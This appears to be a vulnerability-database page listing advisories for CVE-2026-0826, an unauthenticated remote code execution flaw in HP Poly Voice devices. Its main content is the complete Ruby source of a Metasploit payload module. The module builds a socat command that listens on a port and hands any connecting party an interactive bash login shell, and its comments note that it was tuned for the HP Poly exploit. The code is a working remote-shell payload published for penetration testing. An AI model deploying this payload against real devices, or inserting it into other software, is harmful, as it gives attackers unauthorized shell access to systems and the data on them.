| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2026-0826 | 1 Jun 202614:55 | – | attackerkb | |
| CVE-2026-0826 | 1 Jun 202615:53 | – | circl | |
| HP Poly Voice 安全漏洞 | 1 Jun 202600:00 | – | cnnvd | |
| CVE-2026-0826 | 1 Jun 202614:55 | – | cve | |
| CVE-2026-0826 Poly Voice – Possible Remote Control of Certain Poly Devices | 1 Jun 202614:55 | – | cvelist | |
| EUVD-2026-33658 | 1 Jun 202614:55 | – | euvd | |
| Poly Voice – Possible Remote Control of Certain Poly Devices | 1 Jun 202600:00 | – | hp | |
| HP Poly Voice Unauthenticated Remote Code Execution | 18 Jun 202619:01 | – | metasploit | |
| CVE-2026-0826 | 1 Jun 202615:16 | – | nvd | |
| 📄 HP Poly Voice Unauthenticated Remote Code Execution | 19 Jun 202600:00 | – | packetstorm |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 64
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(
merge_info(
info,
'Name' => 'Unix Command Shell, Bind TCP (via socat)',
'Description' => 'Creates an interactive shell via socat',
'Author' => 'sfewer-r7',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'socat',
'Payload' => {
'Offsets' => {},
'Payload' => ''
}
)
)
register_advanced_options(
[
OptString.new('SocatPath', [true, 'The path to the Socat executable', 'socat']),
OptString.new('BashPath', [true, 'The path to the shell executable', 'bash'])
]
)
end
#
# Constructs the payload
#
def generate(_opts = {})
vprint_good(command_string)
return super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
# * We allow a custom socat and bash path be specified as some embedded systems may have them in non-standard locations.
# * We use the shorthand tcp-l instead of tcp-listen to save a few characters.
# * We do not use fork with tcp-l, so this payload will only handle one connection and is not persistent.
# * We exec a shell, but do not pass the -li arguments. This is to avoid a whitespace in the exec string, which for
# some exploits (HP Poly CVE-2026-0826) incur an encoding issue that cannot be solved via an encoder like IFS.
# * We make the shell an interactive login shell by using the login and pty options for socat.
# * We use setsid to make the shell run in a new session, which should ensure stability if the parent dies.
# * We use stderr so error message are visible.
# * We use sigint to pass ctrl-c to the shell and not kill socat.
# * We use sane to try and clean up any terminal character issues and start from a default state.
"#{datastore['SocatPath']} tcp-l:#{datastore['LPORT']} exec:'#{datastore['BashPath']}',login,pty,stderr,setsid,sigint,sane"
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation